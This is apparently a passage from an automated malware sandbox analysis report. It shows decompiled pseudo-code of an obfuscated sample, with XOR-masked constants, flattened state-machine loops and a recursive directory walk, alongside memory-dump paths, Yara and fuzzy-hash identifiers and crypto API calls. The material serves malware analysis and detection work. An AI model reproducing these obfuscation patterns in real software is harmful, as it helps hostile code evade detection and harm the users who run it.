				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E006D85BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E006C7B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E006D889D(0x6dc9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x6dca2c; // 0x248300
						_t196 = _t282 + 0x230; // 0x710050
						E006CC680(_t196, _v1096, _v1136, _t264, _v1104,  *0x6dca2c, _t245,  &_v520);
						_t238 = E006D2025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E006D889D(0x6dc980, _v1088, __eflags);
					_t240 = E006D8C8F(_v1056);
					_t258 =  *0x6dca2c; // 0x248300
					_t210 = _t258 + 0x230; // 0x248530
					E006C29E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E006D2025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}













































                                          0x006d8f49
                                          0x006d8f4f
                                          0x006d8f56
                                          0x006d8f5e
                                          0x006d8f66
                                          0x006d8f78
                                          0x006d8f7d
                                          0x006d8f83
                                          0x006d8f88
                                          0x006d8f8d
                                          0x006d8f95
                                          0x006d8f9d
                                          0x006d8fa5
                                          0x006d8fad
                                          0x006d8fb5
                                          0x006d8fc2
                                          0x006d8fca
                                          0x006d8fd2
                                          0x006d8fda
                                          0x006d8fe2
                                          0x006d8fea
                                          0x006d8fef
                                          0x006d8ff7
                                          0x006d8fff
                                          0x006d900c
                                          0x006d900d
                                          0x006d9011
                                          0x006d9019
                                          0x006d901e
                                          0x006d9026
                                          0x006d902e
                                          0x006d9038
                                          0x006d903c
                                          0x006d9044
                                          0x006d904c
                                          0x006d905a
                                          0x006d905e
                                          0x006d9066
                                          0x006d906e
                                          0x006d9076
                                          0x006d9083
                                          0x006d9087
                                          0x006d908f
                                          0x006d9097
                                          0x006d909f
                                          0x006d90a9
                                          0x006d90ad
                                          0x006d90b5
                                          0x006d90bd
                                          0x006d90c5
                                          0x006d90cd
                                          0x006d90d5
                                          0x006d90dd
                                          0x006d90e5
                                          0x006d90ed
                                          0x006d90f5
                                          0x006d90fd
                                          0x006d9105
                                          0x006d910a
                                          0x006d9112
                                          0x006d911f
                                          0x006d9123
                                          0x006d912b
                                          0x006d9133
                                          0x006d913d
                                          0x006d9145
                                          0x006d914a
                                          0x006d9155
                                          0x006d915a
                                          0x006d9160
                                          0x006d9168
                                          0x006d9175
                                          0x006d9178
                                          0x006d9181
                                          0x006d9185
                                          0x006d918a
                                          0x006d9192
                                          0x006d919a
                                          0x006d919f
                                          0x006d91a7
                                          0x006d91af
                                          0x006d91b7
                                          0x006d91bf
                                          0x006d91c7
                                          0x006d91d7
                                          0x006d91df
                                          0x006d91ef
                                          0x006d91f3
                                          0x006d91fb
                                          0x006d9203
                                          0x006d920b
                                          0x006d9213
                                          0x006d921b
                                          0x006d9223
                                          0x006d922b
                                          0x006d9233
                                          0x006d923b
                                          0x006d9247
                                          0x006d924a
                                          0x006d924e
                                          0x006d9256
                                          0x006d9262
                                          0x006d9276
                                          0x006d9276
                                          0x006d9280
                                          0x006d938d
                                          0x006d9395
                                          0x00000000
                                          0x006d939c
                                          0x006d928c
                                          0x006d92fc
                                          0x00000000
                                          0x006d92fc
                                          0x006d928e
                                          0x006d9290
                                          0x00000000
                                          0x00000000
                                          0x006d9296
                                          0x006d92a3
                                          0x006d92a8
                                          0x006d92c7
                                          0x006d92d4
                                          0x006d92da
                                          0x006d92ed
                                          0x006d92f2
                                          0x006d92f5
                                          0x006d92f5
                                          0x006d9303
                                          0x006d9310
                                          0x006d931f
                                          0x006d9341
                                          0x006d934d
                                          0x006d9353
                                          0x006d9369
                                          0x006d936e
                                          0x006d9371
                                          0x006d9373
                                          0x006d9373
                                          0x006d9373
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                          • API String ID: 0-1402005448
                                          • Opcode ID: d9ab6bbc9be6e8f19497e7ea6a0472d605529e157114d2f01a73206d6923be1a
                                          • Instruction ID: 69cf29abfcf2005df0567ff4834037e171559db3ec27bac8724858d3eed1dd69
                                          • Opcode Fuzzy Hash: d9ab6bbc9be6e8f19497e7ea6a0472d605529e157114d2f01a73206d6923be1a
                                          • Instruction Fuzzy Hash: 7DB1337190D3419FD398CF24C58A50BFBE2FBC4758F109A1EF195862A0C7B98A49CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D1773, Relevance: 12.6, Strings: 10, Instructions: 147COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E006D1773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006C602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E006C8736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E006D77A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E006D77A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}


























                                          0x006d177a
                                          0x006d177e
                                          0x006d1782
                                          0x006d1786
                                          0x006d178a
                                          0x006d178c
                                          0x006d1791
                                          0x006d1799
                                          0x006d17a3
                                          0x006d17a5
                                          0x006d17b6
                                          0x006d17b7
                                          0x006d17bb
                                          0x006d17c3
                                          0x006d17cb
                                          0x006d17d5
                                          0x006d17d9
                                          0x006d17de
                                          0x006d17e6
                                          0x006d17f9
                                          0x006d17fd
                                          0x006d1805
                                          0x006d180d
                                          0x006d1815
                                          0x006d181d
                                          0x006d1825
                                          0x006d182d
                                          0x006d1832
                                          0x006d183a
                                          0x006d1842
                                          0x006d1847
                                          0x006d184f
                                          0x006d1857
                                          0x006d185f
                                          0x006d1867
                                          0x006d186f
                                          0x006d1877
                                          0x006d187f
                                          0x006d1884
                                          0x006d1889
                                          0x006d1891
                                          0x006d1899
                                          0x006d18a1
                                          0x006d18a9
                                          0x006d18b1
                                          0x006d18b9
                                          0x006d18c1
                                          0x006d18c9
                                          0x006d18d1
                                          0x006d18d9
                                          0x006d18de
                                          0x006d18e6
                                          0x006d18ee
                                          0x006d18f6
                                          0x006d18fb
                                          0x006d1903
                                          0x006d190b
                                          0x006d1913
                                          0x006d1918
                                          0x006d1920
                                          0x006d1928
                                          0x006d192d
                                          0x006d1935
                                          0x006d193d
                                          0x006d1945
                                          0x006d194d
                                          0x006d1955
                                          0x006d195d
                                          0x006d195d
                                          0x006d1963
                                          0x006d19c0
                                          0x006d19c1
                                          0x006d19ca
                                          0x006d19d0
                                          0x006d19d2
                                          0x00000000
                                          0x006d19d2
                                          0x006d1965
                                          0x006d1967
                                          0x006d19a0
                                          0x006d19a5
                                          0x006d19aa
                                          0x006d19ac
                                          0x00000000
                                          0x006d19ac
                                          0x006d1969
                                          0x006d196f
                                          0x00000000
                                          0x006d1975
                                          0x006d1975
                                          0x00000000
                                          0x006d1975
                                          0x006d196f
                                          0x006d1967
                                          0x00000000
                                          0x006d1963
                                          0x006d19fc
                                          0x006d1a01
                                          0x006d1a04
                                          0x006d1a09
                                          0x006d1a09
                                          0x006d1a16
                                          0x006d1a1e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                          • API String ID: 0-656425227
                                          • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                          • Instruction ID: 3cef023b1d38c09324cbb1ed22be030f3f53002b62e81933fab516292acc3e20
                                          • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                          • Instruction Fuzzy Hash: 366132715083819FD354CF60C89982BBBE2BBC5788F10491DF5969A260D3B5CA08CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                          • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                          • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                          • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                          • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                          • CoTaskMemFree.OLE32(?), ref: 100027D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                          • String ID: o
                                          • API String ID: 207024522-3306556724
                                          • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                          • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                          • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                          • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D2B16, Relevance: 11.6, Strings: 9, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E006D2B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E006D889D(0x6dc0b0, _v1756, __eflags);
									_pop(_t360);
									E006CC680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E006D2B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E006D2025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E006C595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E006D7BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E006D889D(0x6dc090, _v1736, __eflags));
							_t346 = E006D2025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E006C109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E006C1B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}


























































                                          0x006d2b1f
                                          0x006d2b26
                                          0x006d2b2d
                                          0x006d2b34
                                          0x006d2b3b
                                          0x006d2b43
                                          0x006d2b44
                                          0x006d2b49
                                          0x006d2b54
                                          0x006d2b5d
                                          0x006d2b64
                                          0x006d2b69
                                          0x006d2b6f
                                          0x006d2b77
                                          0x006d2b7f
                                          0x006d2b87
                                          0x006d2b8f
                                          0x006d2b97
                                          0x006d2b9f
                                          0x006d2ba7
                                          0x006d2baf
                                          0x006d2bb7
                                          0x006d2bbf
                                          0x006d2bc7
                                          0x006d2bcf
                                          0x006d2bd4
                                          0x006d2bd9
                                          0x006d2be1
                                          0x006d2be9
                                          0x006d2bf1
                                          0x006d2bf9
                                          0x006d2c01
                                          0x006d2c09
                                          0x006d2c0e
                                          0x006d2c16
                                          0x006d2c1e
                                          0x006d2c29
                                          0x006d2c34
                                          0x006d2c3f
                                          0x006d2c4c
                                          0x006d2c4f
                                          0x006d2c53
                                          0x006d2c60
                                          0x006d2c64
                                          0x006d2c6c
                                          0x006d2c77
                                          0x006d2c7f
                                          0x006d2c8a
                                          0x006d2c92
                                          0x006d2c9a
                                          0x006d2ca2
                                          0x006d2caa
                                          0x006d2cb2
                                          0x006d2cba
                                          0x006d2cc6
                                          0x006d2cc9
                                          0x006d2ccd
                                          0x006d2cd5
                                          0x006d2cdd
                                          0x006d2ce5
                                          0x006d2ced
                                          0x006d2cfa
                                          0x006d2cfe
                                          0x006d2d06
                                          0x006d2d10
                                          0x006d2d18
                                          0x006d2d1d
                                          0x006d2d25
                                          0x006d2d2d
                                          0x006d2d3b
                                          0x006d2d40
                                          0x006d2d46
                                          0x006d2d52
                                          0x006d2d55
                                          0x006d2d59
                                          0x006d2d61
                                          0x006d2d6e
                                          0x006d2d72
                                          0x006d2d7a
                                          0x006d2d7f
                                          0x006d2d87
                                          0x006d2d92
                                          0x006d2d9a
                                          0x006d2da5
                                          0x006d2dad
